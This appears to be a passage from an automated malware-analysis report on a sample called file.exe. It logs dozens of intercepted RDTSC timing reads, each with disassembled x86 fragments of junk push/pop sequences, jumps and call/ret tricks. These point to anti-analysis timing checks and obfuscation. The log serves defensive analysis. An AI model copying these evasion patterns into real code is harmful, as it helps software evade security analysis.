Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87E995 second address: 87E99E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87E99E second address: 87E9A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87EABE second address: 87EAC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87EC5C second address: 87EC60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87EC60 second address: 87EC64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 880363 second address: 880368 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 880368 second address: 88036E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 885560 second address: 885566 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 885566 second address: 88556A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 88556A second address: 885582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8A2D3CFEDEh 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81B886 second address: 81B89C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F8A2CE89C9Eh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81B89C second address: 81B8B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F8A2D3CFEE5h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81B8B7 second address: 81B8BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81B8BB second address: 81B8C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8848EF second address: 8848FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007F8A2CE89C9Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 884A83 second address: 884AA4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2D3CFEE9h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 884AA4 second address: 884AA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 884BE3 second address: 884BEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F8A2D3CFED6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 884D88 second address: 884D8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 885174 second address: 88518D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007F8A2D3CFEDFh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 889E73 second address: 889E7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 889E7B second address: 889E7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 88A324 second address: 88A32A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 88A7EB second address: 88A823 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2D3CFEE3h 0x00000007 jl 00007F8A2D3CFED6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jnc 00007F8A2D3CFEE2h 0x00000015 pushad 0x00000016 jc 00007F8A2D3CFED6h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 88ADA1 second address: 88ADA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 88F6B4 second address: 88F6BE instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8A2D3CFED6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 811877 second address: 811881 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F8A2CE89C96h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85457B second address: 8545DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2D3CFEE5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F8A2D3CFED8h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 mov ecx, dword ptr [ebp+122D3A5Bh] 0x0000002a and ecx, dword ptr [ebp+122D3947h] 0x00000030 lea eax, dword ptr [ebp+12489358h] 0x00000036 mov ecx, edi 0x00000038 nop 0x00000039 push ebx 0x0000003a push edx 0x0000003b push ecx 0x0000003c pop ecx 0x0000003d pop edx 0x0000003e pop ebx 0x0000003f push eax 0x00000040 push edi 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8545DA second address: 8545E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8545E0 second address: 83CC16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 nop 0x00000007 movsx edi, dx 0x0000000a call dword ptr [ebp+122D2485h] 0x00000010 pushad 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 854A08 second address: 854A0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 854EE7 second address: 854F46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 popad 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d ja 00007F8A2D3CFEEBh 0x00000013 ja 00007F8A2D3CFED8h 0x00000019 popad 0x0000001a mov eax, dword ptr [eax] 0x0000001c push ebx 0x0000001d jmp 00007F8A2D3CFEE9h 0x00000022 pop ebx 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 pushad 0x00000028 jc 00007F8A2D3CFED8h 0x0000002e push edi 0x0000002f pop edi 0x00000030 push eax 0x00000031 push edx 0x00000032 push edi 0x00000033 pop edi 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 855173 second address: 855195 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a mov ecx, 28946946h 0x0000000f push 00000004h 0x00000011 nop 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F8A2CE89C9Eh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 855592 second address: 8555C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 push edi 0x00000007 pop edi 0x00000008 pop esi 0x00000009 popad 0x0000000a nop 0x0000000b or cl, 00000026h 0x0000000e push 0000001Eh 0x00000010 call 00007F8A2D3CFEE3h 0x00000015 mov edx, dword ptr [ebp+122D3AA7h] 0x0000001b pop edi 0x0000001c nop 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8555C2 second address: 8555CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F8A2CE89C96h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8555CD second address: 8555DF instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8A2D3CFED8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8555DF second address: 8555E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85571C second address: 855722 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 855722 second address: 85572C instructions: 0x00000000 rdtsc 0x00000002 je 00007F8A2CE89C9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85572C second address: 85573E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8558E5 second address: 8558E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8558E9 second address: 8558EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8558EF second address: 855921 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8A2CE89C98h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push edi 0x0000000f jmp 00007F8A2CE89CA0h 0x00000014 pop edi 0x00000015 mov eax, dword ptr [eax] 0x00000017 push eax 0x00000018 push edx 0x00000019 jbe 00007F8A2CE89C9Ch 0x0000001f jnp 00007F8A2CE89C96h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 88EDFA second address: 88EE11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8A2D3CFEE3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 88EE11 second address: 88EE39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8A2CE89CA5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c jg 00007F8A2CE89C96h 0x00000012 pop ebx 0x00000013 pop eax 0x00000014 push ecx 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 88F1A6 second address: 88F1AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 893D38 second address: 893D3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 893EA2 second address: 893EA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8941A1 second address: 8941BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2CE89CA2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8944BD second address: 8944C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007F8A2D3CFED6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8944C9 second address: 8944CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8944CD second address: 8944D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81833E second address: 818344 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 818344 second address: 81834A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81834A second address: 81834F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 89EFA0 second address: 89EFCB instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8A2D3CFED6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d jc 00007F8A2D3CFED6h 0x00000013 jmp 00007F8A2D3CFEE7h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 89EFCB second address: 89EFD5 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8A2CE89C9Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 89EFD5 second address: 89EFF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F8A2D3CFEE5h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 89F132 second address: 89F14D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8A2CE89CA7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 89F14D second address: 89F152 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A1EBC second address: 8A1EE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F8A2CE89CA7h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A2040 second address: 8A2046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A2046 second address: 8A204A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A204A second address: 8A205C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2D3CFEDEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A88A8 second address: 8A88AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A88AC second address: 8A88B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A88B1 second address: 8A88BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F8A2CE89C96h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A88BD second address: 8A88C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A88C8 second address: 8A88CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A88CE second address: 8A88D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A8CF0 second address: 8A8CF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A8CF4 second address: 8A8D07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007F8A2D3CFED6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A8D07 second address: 8A8D0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A8D0F second address: 8A8D15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A8E51 second address: 8A8E77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007F8A2CE89C9Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F8A2CE89C9Dh 0x00000015 push esi 0x00000016 pop esi 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8553C4 second address: 855431 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebp 0x0000000a call 00007F8A2D3CFED8h 0x0000000f pop ebp 0x00000010 mov dword ptr [esp+04h], ebp 0x00000014 add dword ptr [esp+04h], 0000001Bh 0x0000001c inc ebp 0x0000001d push ebp 0x0000001e ret 0x0000001f pop ebp 0x00000020 ret 0x00000021 sub di, FA00h 0x00000026 mov edi, esi 0x00000028 mov ebx, dword ptr [ebp+12489397h] 0x0000002e push 00000000h 0x00000030 push ebx 0x00000031 call 00007F8A2D3CFED8h 0x00000036 pop ebx 0x00000037 mov dword ptr [esp+04h], ebx 0x0000003b add dword ptr [esp+04h], 00000014h 0x00000043 inc ebx 0x00000044 push ebx 0x00000045 ret 0x00000046 pop ebx 0x00000047 ret 0x00000048 sub ecx, dword ptr [ebp+122D3A17h] 0x0000004e add eax, ebx 0x00000050 pushad 0x00000051 sub dword ptr [ebp+122D3712h], eax 0x00000057 mov edi, 52AF3DCAh 0x0000005c popad 0x0000005d push eax 0x0000005e push edi 0x0000005f push eax 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A9D62 second address: 8A9D67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A9D67 second address: 8A9DA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F8A2D3CFED6h 0x00000009 jmp 00007F8A2D3CFEE8h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F8A2D3CFEE8h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A9DA8 second address: 8A9DBF instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8A2CE89C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jng 00007F8A2CE89C9Ah 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8AE0D1 second address: 8AE0E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8A2D3CFEDEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8AE0E4 second address: 8AE104 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8A2CE89C9Bh 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F8A2CE89C9Dh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8AE104 second address: 8AE12E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8A2D3CFEE7h 0x00000010 push esi 0x00000011 jns 00007F8A2D3CFED6h 0x00000017 pop esi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8AD85A second address: 8AD880 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F8A2CE89CA8h 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8AD880 second address: 8AD884 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8ADC64 second address: 8ADC71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007F8A2CE89C96h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8ADC71 second address: 8ADC87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2D3CFEE2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B116E second address: 8B117C instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8A2CE89C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B117C second address: 8B1187 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B1187 second address: 8B118D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B0ECA second address: 8B0ECF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B794D second address: 8B7953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B7953 second address: 8B795B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B795B second address: 8B796F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8A2CE89CA0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B7CC9 second address: 8B7CDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8A2D3CFEDCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
